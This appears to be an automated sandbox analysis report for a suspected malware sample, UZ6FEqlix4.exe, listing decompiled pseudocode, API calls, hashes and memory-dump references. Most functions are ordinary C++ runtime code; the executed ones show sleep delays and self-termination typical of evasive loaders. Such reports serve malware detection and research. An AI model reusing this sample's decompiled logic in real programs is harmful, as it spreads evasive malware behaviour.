Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8H_prologIncrefInitMutexMutex::_Throw_atexitstd::_std::bad_alloc::bad_allocstd::locale::_std::locale::facet::_std::locale::locale
String ID: C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\streambuf
API String ID: 2783830272-1761835556
Opcode ID: 3b1d3098f1eeec7a73633b72738e42e01c38a3edd75f6cfa3736fbfad5197b86
Instruction ID: a11ca07ea45ec4b6388feafff00c013a8ce765d1b49d50070f5b82cf09c2acaf
Opcode Fuzzy Hash: 3b1d3098f1eeec7a73633b72738e42e01c38a3edd75f6cfa3736fbfad5197b86
Instruction Fuzzy Hash: E7F089B1F10210BAD714ABA59D027E972E69B04709F10481FB516D36C2DBBC9940875D

Uniqueness

Uniqueness Score: -1.00%

Function 0041D8AF, Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 51
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D8AF() {
				void* _t23;
				intOrPtr _t25;
				intOrPtr _t26;
				intOrPtr _t29;
				void* _t30;
				intOrPtr* _t37;
				void* _t39;

				E004235C8(0x43d5ac, _t39);
				 *(_t39 - 0x10) =  *(_t39 - 0x10) & 0x00000000;
				_t37 =  *((intOrPtr*)(_t39 + 8));
				if(_t37 != 0 &&  *_t37 == 0) {
					 *((intOrPtr*)(_t39 - 0x14)) = E0041EF00();
					_t25 = E0041EE30(0x18, _t24, "C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\include\\xlocale", 0x945);
					 *((intOrPtr*)(_t39 + 8)) = _t25;
					 *(_t39 - 4) =  *(_t39 - 4) & 0x00000000;
					if(_t25 == 0) {
						_t26 = 0;
						__eflags = 0;
					} else {
						_t29 =  *((intOrPtr*)( *((intOrPtr*)(_t39 + 0xc))));
						_t33 =  *((intOrPtr*)(_t29 + 0x18));
						if( *((intOrPtr*)(_t29 + 0x18)) == 0) {
							_t33 = _t29 + 0x1c;
						}
						_t30 = E0041D7C8(_t39 - 0x38, _t33);
						 *(_t39 - 0x10) = 1;
						_t26 = E0041D21E( *((intOrPtr*)(_t39 + 8)), _t30, 0);
					}
					 *(_t39 - 4) =  *(_t39 - 4) | 0xffffffff;
					_t49 =  *(_t39 - 0x10) & 0x00000001;
					 *_t37 = _t26;
					if(( *(_t39 - 0x10) & 0x00000001) != 0) {
						E0041D84D(_t39 - 0x38, _t49);
					}
				}
				_t23 = 2;
				 *[fs:0x0] =  *((intOrPtr*)(_t39 - 0xc));
				return _t23;
			}

0x0041d8b4
0x0041d8bc
0x0041d8c1
0x0041d8c6
0x0041d8df
0x0041d8e2
0x0041d8ea
0x0041d8ed
0x0041d8f3
0x0041d921
0x0041d921
0x0041d8f5
0x0041d8f8
0x0041d8fa
0x0041d8ff
0x0041d901
0x0041d901
0x0041d908
0x0041d913
0x0041d91a
0x0041d91a
0x0041d923
0x0041d927
0x0041d92b
0x0041d92d
0x0041d932
0x0041d932
0x0041d92d
0x0041d93c
0x0041d93e
0x0041d946

APIs

__EH_prolog.LIBCMT ref: 0041D8B4
new.LIBCPMTD ref: 0041D8E2

Part of subcall function 0041EE30: std::bad_alloc::bad_alloc.LIBCMTD ref: 0041EE78
Part of subcall function 0041EE30: _atexit.LIBCMTD ref: 0041EE82
Part of subcall function 0041EE30: __CxxThrowException@8.LIBCMTD ref: 0041EEA0

ctype.LIBCPMT ref: 0041D91A

Strings

C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale, xrefs: 0041D8D7

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8H_prologThrow_atexitctypestd::bad_alloc::bad_alloc
String ID: C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale
API String ID: 1227218297-176748764
Opcode ID: 81b4649f4970a158fc9f6ce6a58810d2b559aa0c2965a21b8a68d8fb40042134
Instruction ID: d706637da5c2e3045b97fb1be35efa2f9f11daa4525db9af25351557e30d2ff5
Opcode Fuzzy Hash: 81b4649f4970a158fc9f6ce6a58810d2b559aa0c2965a21b8a68d8fb40042134
Instruction Fuzzy Hash: 5011A0B1E00205BFDB04EFA5C841BEEB7B0AF00718F10451EF811A72D1D7789A84CB58

Uniqueness

Uniqueness Score: -1.00%

Function 0041D9CF, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041D9CF(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				void* _t17;

				_push(_a4);
				E0041D2C3(_a4, _a8, L"C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\include\\xlocale", 0x98f);
				if(_a12 == 0) {
					E004201F0(L"invalid null pointer", L"C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\include\\xlocale", 0x990);
					_t17 = _t17 + 0xc;
				}
				E00420A90(_a12, _a4, _a8 - _a4);
				return _a8;
			}

0x0041d9d3
0x0041d9e7
0x0041d9f0
0x0041d9fd
0x0041da02
0x0041da02
0x0041da12
0x0041da1f

APIs

Part of subcall function 0041D2C3: std::_Debug_message.LIBCPMTD ref: 0041D2F9

std::_Debug_message.LIBCPMTD ref: 0041D9FD
_memmove.LIBCMT ref: 0041DA12

Strings

C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale, xrefs: 0041D9D6, 0041D9E0, 0041D9F7
invalid null pointer, xrefs: 0041D9F8

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Debug_messagestd::_$_memmove
String ID: C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale$invalid null pointer
API String ID: 3614558019-955221705
Opcode ID: a60112d5f73250519a2c5d6f1698f5769d96ab7ac2997c2be8cdffa2ff72c77e
Instruction ID: 42cc9f1bff93f191855e041ad050ca75ec69e6426a8093ff93c88e55f548bb6d
Opcode Fuzzy Hash: a60112d5f73250519a2c5d6f1698f5769d96ab7ac2997c2be8cdffa2ff72c77e
Instruction Fuzzy Hash: 42F0303594021CBBDF019F45DC06EDA3F64EF113A4F008026FD1C191A2D7769A64D7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041DA22, Relevance: 7.0, APIs: 2, Strings: 2, Instructions: 28
COMMON

Download Yara Rule

C-Code - Quality: 82%

			E0041DA22(intOrPtr _a4, intOrPtr _a8, intOrPtr _a16) {
				void* _t17;

				_push(_a4);
				E0041D2C3(_a4, _a8, L"C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\include\\xlocale", 0x99d);
				if(_a16 == 0) {
					E004201F0(L"invalid null pointer", L"C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\include\\xlocale", 0x99e);
					_t17 = _t17 + 0xc;
				}
				E00420A90(_a16, _a4, _a8 - _a4);
				return _a8;
			}

0x0041da26
0x0041da3a
0x0041da43
0x0041da50
0x0041da55
0x0041da55
0x0041da65
0x0041da72

APIs

Part of subcall function 0041D2C3: std::_Debug_message.LIBCPMTD ref: 0041D2F9

std::_Debug_message.LIBCPMTD ref: 0041DA50
_memmove.LIBCMT ref: 0041DA65

Strings

C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale, xrefs: 0041DA29, 0041DA33, 0041DA4A
invalid null pointer, xrefs: 0041DA4B

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Debug_messagestd::_$_memmove
String ID: C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xlocale$invalid null pointer
API String ID: 3614558019-955221705
Opcode ID: 372324b463c3e2f6ea87b04da71c2b1291146fa10298d9534c3770adc7a6c383
Instruction ID: aa94861d176f6ac8c2618653b9cd0a5c09680d1a1467b36467b2b72e7d05b8dd
Opcode Fuzzy Hash: 372324b463c3e2f6ea87b04da71c2b1291146fa10298d9534c3770adc7a6c383
Instruction Fuzzy Hash: FEF0303594021CBBDF019F55EC06EDA3F65DF113A4F008026FD0C191A2C2769AA4D7D9

Uniqueness

Uniqueness Score: -1.00%

Function 0041F4D0, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 46
memoryCOMMON

Download Yara Rule

C-Code - Quality: 68%

			E0041F4D0(intOrPtr* __ecx) {
				intOrPtr _v8;
				char _v16;
				char _v17;
				intOrPtr* _v24;
				signed int _t16;
				void* _t27;
				signed int _t39;

				_push(0xffffffff);
				_push(0x43d818);
				_push( *[fs:0x0]);
				_t16 =  *0x447b80; // 0x5c71e752
				_push(_t16 ^ _t39);
				_t1 =  &_v16; // 0x5c71e752
				 *[fs:0x0] = _t1;
				_v24 = __ecx;
				_v8 = 0;
				E0041F670( &_v17, _v24 + 0x1c);
				E0041F460(_v24);
				E0041FC00( &_v17,  *_v24);
				_push(1);
				E0041F690( &_v17,  *_v24);
				 *_v24 = 0;
				_v8 = 0xffffffff;
				_t27 = E0041F440(_v24);
				_t14 =  &_v16; // 0x5c71e752
				 *[fs:0x0] =  *_t14;
				return _t27;
			}

0x0041f4d5
0x0041f4d7
0x0041f4e2
0x0041f4e6
0x0041f4ed
0x0041f4ee
0x0041f4f1
0x0041f4f7
0x0041f4fa
0x0041f50b
0x0041f513
0x0041f522
0x0041f52a
0x0041f535
0x0041f53d
0x0041f543
0x0041f54d
0x0041f552
0x0041f555
0x0041f560

APIs

std::_Container_base12::_Orphan_all.LIBCPMTD ref: 0041F513

Part of subcall function 0041F460: std::_Lockit::_Lockit.LIBCPMTD ref: 0041F478
Part of subcall function 0041F460: std::_Lockit::~_Lockit.LIBCPMTD ref: 0041F4BB

Part of subcall function 0041FC00: allocator.LIBCPMTD ref: 0041FC0C

_DebugHeapAllocator.LIBCPMTD ref: 0041F535

Part of subcall function 0041F690: delete.LIBCMTD ref: 0041F69D

Part of subcall function 0041F440: std::_Container_base12::_Orphan_all.LIBCPMTD ref: 0041F44C

Strings

Rq\, xrefs: 0041F4EE, 0041F552

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Container_base12::_LockitOrphan_all$AllocatorDebugHeapLockit::_Lockit::~_allocatordelete
String ID: Rq\
API String ID: 2985947288-2255371958
Opcode ID: 761669b75a5f33c64c1944e2bec50e9f32d9125ed55b1b920a9ee8f034aa56f9
Instruction ID: 05ac5ff3bb3a6df078525f3e352fe75b23d0123c765d2a50f4624dc527cc7d01
Opcode Fuzzy Hash: 761669b75a5f33c64c1944e2bec50e9f32d9125ed55b1b920a9ee8f034aa56f9
Instruction Fuzzy Hash: 52115E75D00508ABCB04DF98C941BDFB7B8EB45718F20426AE415B7391DB356E05CBA5

Uniqueness

Uniqueness Score: -1.00%

Function 00424C10, Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 38
COMMON

Download Yara Rule

C-Code - Quality: 65%

			E00424C10(char _a4) {
				intOrPtr _v8;
				signed int _v12;
				char _v20;
				intOrPtr _v32;
				signed int _t11;
				signed int _t27;

				_push(0xfffffffe);
				_push(0x43e700);
				_push(E004275F0);
				_push( *[fs:0x0]);
				_t11 =  *0x447b80; // 0x5c71e752
				_v12 = _v12 ^ _t11;
				_push(_t11 ^ _t27);
				_t3 =  &_v20; // 0x423669
				 *[fs:0x0] = _t3;
				E00423C00();
				_v8 = 0;
				_t5 =  &_a4; // 0x423669
				_v32 = E00424C90( *_t5);
				_v8 = 0xfffffffe;
				E00424C6B();
				_t9 =  &_v20; // 0x423669
				 *[fs:0x0] =  *_t9;
				return _v32;
			}

0x00424c15
0x00424c17
0x00424c1c
0x00424c27
0x00424c2e
0x00424c33
0x00424c38
0x00424c39
0x00424c3c
0x00424c42
0x00424c47
0x00424c4e
0x00424c5a
0x00424c5d
0x00424c64
0x00424c74
0x00424c77
0x00424c85

APIs

__onexit_nolock.LIBCMTD ref: 00424C52

Part of subcall function 00424C90: DecodePointer.KERNEL32(?,00424C57,i6B,5C71E752), ref: 00424C9E
Part of subcall function 00424C90: DecodePointer.KERNEL32(?), ref: 00424CAE

Strings

i6B, xrefs: 00424C4E, 00424C51
i6B, xrefs: 00424C39, 00424C74

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: DecodePointer$__onexit_nolock
String ID: i6B$i6B
API String ID: 1291430618-181027038
Opcode ID: fd7c178cf2d4c51eb65d0fa0c8b00518c8fbed956de1760a550424c6f9d28b05
Instruction ID: 2b04e2d959eac300b4e3bd805978f211653e8b71308d256705e08e3b25770a39
Opcode Fuzzy Hash: fd7c178cf2d4c51eb65d0fa0c8b00518c8fbed956de1760a550424c6f9d28b05
Instruction Fuzzy Hash: D9F0F9B6A04658ABC700CF9AEC45B9BB7B8FB85734F10462BF425D3380D73D55008A54

Uniqueness

Uniqueness Score: -1.00%

Function 0041D42E, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 34
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0041D42E(void* __ecx) {
				intOrPtr _t15;
				void* _t19;

				_t19 = __ecx;
				 *((intOrPtr*)(__ecx + 0x30)) = 0;
				 *((intOrPtr*)(__ecx + 8)) = 0;
				 *((intOrPtr*)(__ecx + 0x10)) = 0;
				 *((intOrPtr*)(__ecx + 0x14)) = 0x201;
				 *((intOrPtr*)(__ecx + 0x18)) = 6;
				 *((intOrPtr*)(__ecx + 0x1c)) = 0;
				 *((intOrPtr*)(__ecx + 0x20)) = 0;
				 *((intOrPtr*)(__ecx + 0x24)) = 0;
				 *((intOrPtr*)(__ecx + 0x28)) = 0;
				 *((intOrPtr*)(__ecx + 0x2c)) = 0;
				E0041D34A(__ecx, 0, 0);
				if(E0041EE30(4, E0041EF00(), "C:\\Program Files (x86)\\Microsoft Visual Studio 10.0\\VC\\include\\xiosbase", 0x234) == 0) {
					_t15 = 0;
				} else {
					_t15 = E0041A5B6(_t14);
				}
				 *((intOrPtr*)(_t19 + 0x30)) = _t15;
				return _t15;
			}

0x0041d42f
0x0041d436
0x0041d439
0x0041d43c
0x0041d43f
0x0041d446
0x0041d44d
0x0041d450
0x0041d453
0x0041d456
0x0041d459
0x0041d45c
0x0041d47d
0x0041d488
0x0041d47f
0x0041d481
0x0041d481
0x0041d48b
0x0041d48f

APIs

Part of subcall function 0041D34A: __CxxThrowException@8.LIBCMTD ref: 0041D369
Part of subcall function 0041D34A: std::exception::exception.LIBCMTD ref: 0041D38B

new.LIBCPMTD ref: 0041D473

Part of subcall function 0041EE30: std::bad_alloc::bad_alloc.LIBCMTD ref: 0041EE78
Part of subcall function 0041EE30: _atexit.LIBCMTD ref: 0041EE82
Part of subcall function 0041EE30: __CxxThrowException@8.LIBCMTD ref: 0041EEA0

std::locale::locale.LIBCPMT ref: 0041D481

Part of subcall function 0041A5B6: std::locale::_Init.LIBCPMTD ref: 0041A5B9
Part of subcall function 0041A5B6: std::locale::facet::_Incref.LIBCPMT ref: 0041A5C7

Strings

C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xiosbase, xrefs: 0041D466

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Exception@8Throw$IncrefInit_atexitstd::bad_alloc::bad_allocstd::exception::exceptionstd::locale::_std::locale::facet::_std::locale::locale
String ID: C:\Program Files (x86)\Microsoft Visual Studio 10.0\VC\include\xiosbase
API String ID: 2418921096-1419271442
Opcode ID: 52741f46817c43fc251caaee42c765b47ef934e25a6fc0ea124f214322392043
Instruction ID: 7c0778f575010af1352b17f339b0fecc58c2a4df602a7a9e2ab98c4bfcd1ec86
Opcode Fuzzy Hash: 52741f46817c43fc251caaee42c765b47ef934e25a6fc0ea124f214322392043
Instruction Fuzzy Hash: B2F01DB0900B009FD3309F6B9945557FAF9BFE0704B100E1FE88692A61D7F8B5458F59

Uniqueness

Uniqueness Score: -1.00%

Function 0043DA50, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043DA50(void* __eflags) {

				E0041FDF0(0x4c4f50);
				return E00424DE0(E0043DB70);
			}

0x0043da5a
0x0043da6d

APIs

std::_System_error_category::_System_error_category.LIBCPMTD ref: 0043DA5A

Part of subcall function 0041FDF0: std::_Generic_error_category::_Generic_error_category.LIBCPMTD ref: 0041FDFC

_atexit.LIBCMTD ref: 0043DA64

Strings

POL, xrefs: 0043DA55

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: std::_$Generic_error_categoryGeneric_error_category::_System_error_categorySystem_error_category::__atexit
String ID: POL
API String ID: 3833594402-2608245203
Opcode ID: d7d65c6700f48b9c1d85d2e9184f29cf2b9984fd040b7e39479da86890ddeaa3
Instruction ID: caed6d9c4c9a1aebe5e1641cdbc2e222a78325a7c9106c5418ff6ef69e4e9c11
Opcode Fuzzy Hash: d7d65c6700f48b9c1d85d2e9184f29cf2b9984fd040b7e39479da86890ddeaa3
Instruction Fuzzy Hash: AFB092BAA9021813060131963927E6A725A88C4B28BA9003FB91E022426C49B96680AF

Uniqueness

Uniqueness Score: -1.00%

Function 0043DA70, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043DA70() {

				E0041E540(0x4c4fec);
				return E00424DE0(E0043DB90);
			}

0x0043da7a
0x0043da8d

APIs

std::_Init_locks::_Init_locks.LIBCPMTD ref: 0043DA7A

Part of subcall function 0041E540: InterlockedIncrement.KERNEL32(004479A8), ref: 0041E550

_atexit.LIBCMTD ref: 0043DA84

Strings

OL, xrefs: 0043DA75

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: IncrementInit_locksInit_locks::_Interlocked_atexitstd::_
String ID: OL
API String ID: 970615194-3971664621
Opcode ID: 0c3e92233d77ceacf952699620bd3dd16d69f537b8b808caaf536f1809dfc9d4
Instruction ID: 1a9afa6eb2cd93cacb9be53d9c9f72ace77b7db3bb6fdc77157b45a6e8b9129f
Opcode Fuzzy Hash: 0c3e92233d77ceacf952699620bd3dd16d69f537b8b808caaf536f1809dfc9d4
Instruction Fuzzy Hash: D7B0927EA502A822011131D73823E6A724E84C4B2CBA9002FB90D022433D5DBAA080AF

Uniqueness

Uniqueness Score: -1.00%

Function 0043DA10, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043DA10(void* __eflags) {

				E0041EF20(0x4c4f64);
				return E00424DE0(E0043DB30);
			}

0x0043da1a
0x0043da2d

APIs

std::_Generic_error_category::_Generic_error_category.LIBCPMTD ref: 0043DA1A
_atexit.LIBCMTD ref: 0043DA24

Strings

dOL, xrefs: 0043DA15

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Generic_error_categoryGeneric_error_category::__atexitstd::_
String ID: dOL
API String ID: 3960646304-3088376991
Opcode ID: a3db615cfac5bc12b55c09ff4bab3de4b36096e63b8c9c4fab1b99725f370d67
Instruction ID: aa1d96e57c7ae56cd5bbb732fd8aea22b2860897c4863f57ec2b3a46cf0dccfa
Opcode Fuzzy Hash: a3db615cfac5bc12b55c09ff4bab3de4b36096e63b8c9c4fab1b99725f370d67
Instruction Fuzzy Hash: 60B0927AA6431922024532973823A9A724A88C8B28B99002FBD8D022432D49B96180AF

Uniqueness

Uniqueness Score: -1.00%

Function 0043DA30, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 10
COMMON

Download Yara Rule

C-Code - Quality: 100%

			E0043DA30(void* __eflags) {

				E0041FD40(0x4c4f5c);
				return E00424DE0(E0043DB50);
			}

0x0043da3a
0x0043da4d

APIs

std::_Generic_error_category::_Generic_error_category.LIBCPMTD ref: 0043DA3A
_atexit.LIBCMTD ref: 0043DA44

Strings

\OL, xrefs: 0043DA35

Memory Dump Source

Source File: 00000000.00000002.674810341.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.674807644.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.674845396.0000000000447000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674851645.00000000004C5000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.674854677.00000000004C9000.00000002.00020000.sdmp Download File

Similarity

API ID: Generic_error_categoryGeneric_error_category::__atexitstd::_
String ID: \OL
API String ID: 3960646304-2456572087
Opcode ID: d42f3e62f38caf3d6603ba63002d7c1166142dc4e22c081cab3f610ab024f861
Instruction ID: cb1e99182481137889a11706fc8bac71317bb4ba2c8d8aa4e1eddfa328e6d2e6
Opcode Fuzzy Hash: d42f3e62f38caf3d6603ba63002d7c1166142dc4e22c081cab3f610ab024f861
Instruction Fuzzy Hash: DBB0927AA5025812090131D73927A6A724A84C4B28F99003FB91E06642AD49B965D4AF

Uniqueness

Uniqueness Score: -1.00%

Analysis Process: UZ6FEqlix4.exe PID: 6384 Parent PID: 6160 UZ6FEqlix4.exeCOMMON

Executed Functions

Function 0040196D, Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 48
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 46%

			E0040196D(void* __eax, void* __ebx, void* __ecx, void* __edi, short __esi, void* __fp0) {
				intOrPtr _t14;
				void* _t17;
				intOrPtr* _t23;
				void* _t26;
				void* _t27;
				void* _t28;
				signed int _t33;
				intOrPtr* _t35;
				void* _t38;

				_t31 = __esi;
				_t29 = __edi;
				asm("in eax, 0xe5");
				 *((short*)(__eax + _t33 * 2)) = __esi;
				 *((intOrPtr*)(__eax + _t33 * 2)) = __esi;
				_push(0x1999);
				_t14 =  *_t35;
				__eflags = __al;
				_t26 = 0x5c;
				E004012AB(_t14, __ebx, _t26, _t28, __edi, __esi, _t38);
				_t23 =  *((intOrPtr*)(_t33 + 8));
				Sleep(0x1388);
				_t17 = E004014EA(_t28, _t38, __fp0, _t23,  *((intOrPtr*)(_t33 + 0xc)),  *((intOrPtr*)(_t33 + 0x10)), _t33 - 4); // executed
				_t39 = _t17;
				if(_t17 != 0) {
					_push( *((intOrPtr*)(_t33 + 0x14)));
					_push( *((intOrPtr*)(_t33 - 4)));
					_push(_t17);
					_push(_t23); // executed
					E004015BD(_t23, _t28, _t29, _t31, _t39); // executed
				}
				 *_t23(0xffffffff, 0); // executed
				_t27 = 0x5c;
				return E004012AB(0x1999, _t23, _t27, _t28, _t29, _t31, _t39);
			}

0x0040196d
0x0040196d
0x0040196d
0x00401970
0x00401971
0x00401973
0x00401978
0x00401986
0x0040198c
0x00401994
0x00401999
0x004019a1
0x004019af
0x004019b4
0x004019b6
0x004019b8
0x004019bb
0x004019be
0x004019bf
0x004019c0
0x004019c0
0x004019c9
0x004019e8
0x004019f9

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Strings

j\Y, xrefs: 00401989

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID: j\Y
API String ID: 417527130-662177190
Opcode ID: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction ID: 595b9c3ea7707adfb89ee20c44a57f79679102a22a402f6ef59d3c67027402ce
Opcode Fuzzy Hash: 60e19d2a587da5622c2a6d9172a049e9a5b2b5b2e4593a54255e3bb5c4ee03a0
Instruction Fuzzy Hash: B10184B2604245EBDB005FE5DC92DAA3B74AF01314F2401ABF512B91F2DA3C8513E71A

Uniqueness

Uniqueness Score: -1.00%

Function 00401962, Relevance: 3.1, APIs: 2, Instructions: 52
sleepnativeCOMMON

Download Yara Rule

C-Code - Quality: 44%

			E00401962(void* __ecx, void* __fp0, intOrPtr* _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				intOrPtr _t9;
				void* _t12;
				void* _t17;
				intOrPtr* _t18;
				void* _t20;
				void* _t21;
				void* _t22;
				void* _t23;
				void* _t24;
				intOrPtr* _t25;
				void* _t27;

				_push(0x1999);
				_t9 =  *_t25;
				__eflags = __al;
				_t20 = 0x5c;
				E004012AB(_t9, _t17, _t20, _t22, _t23, _t24, _t27);
				_t18 = _a4;
				Sleep(0x1388);
				_t12 = E004014EA(_t22, _t27, __fp0, _t18, _a8, _a12,  &_v8); // executed
				_t28 = _t12;
				if(_t12 != 0) {
					_push(_a16);
					_push(_v8);
					_push(_t12);
					_push(_t18); // executed
					E004015BD(_t18, _t22, _t23, _t24, _t28); // executed
				}
				 *_t18(0xffffffff, 0); // executed
				_t21 = 0x5c;
				return E004012AB(0x1999, _t18, _t21, _t22, _t23, _t24, _t28);
			}

0x00401973
0x00401978
0x00401986
0x0040198c
0x00401994
0x00401999
0x004019a1
0x004019af
0x004019b4
0x004019b6
0x004019b8
0x004019bb
0x004019be
0x004019bf
0x004019c0
0x004019c0
0x004019c9
0x004019e8
0x004019f9

APIs

Sleep.KERNELBASE(00001388), ref: 004019A1
NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessSleepTerminate
String ID:
API String ID: 417527130-0
Opcode ID: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction ID: c7dbb5b86db80192b1cd6b67b95130a9e8bba6362884e51d04f8a5ef40e6dacf
Opcode Fuzzy Hash: e6583a46ba0c482cc9ee2622c86c4f26a038c05ef2be8949cbdfc3cdf2952675
Instruction Fuzzy Hash: A50144F1208205FBEB005AD59DA2E7B3668AB01715F20013BBA03790F1D57D9913E72B

Uniqueness

Uniqueness Score: -1.00%

Function 00401A0B, Relevance: 1.6, APIs: 1, Instructions: 96nativeCOMMON

Download Yara Rule

APIs

NtTerminateProcess.NTDLL(000000FF,00000000,?,?,?,?), ref: 004019C9

Memory Dump Source

Source File: 00000001.00000002.733103599.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true

Similarity

API ID: ProcessTerminate
String ID:
API String ID: 560597551-0
Opcode ID: 00d9af8ada967e92f08724f842517e3d5e3f1b979023ce9469ee702bd8b35524
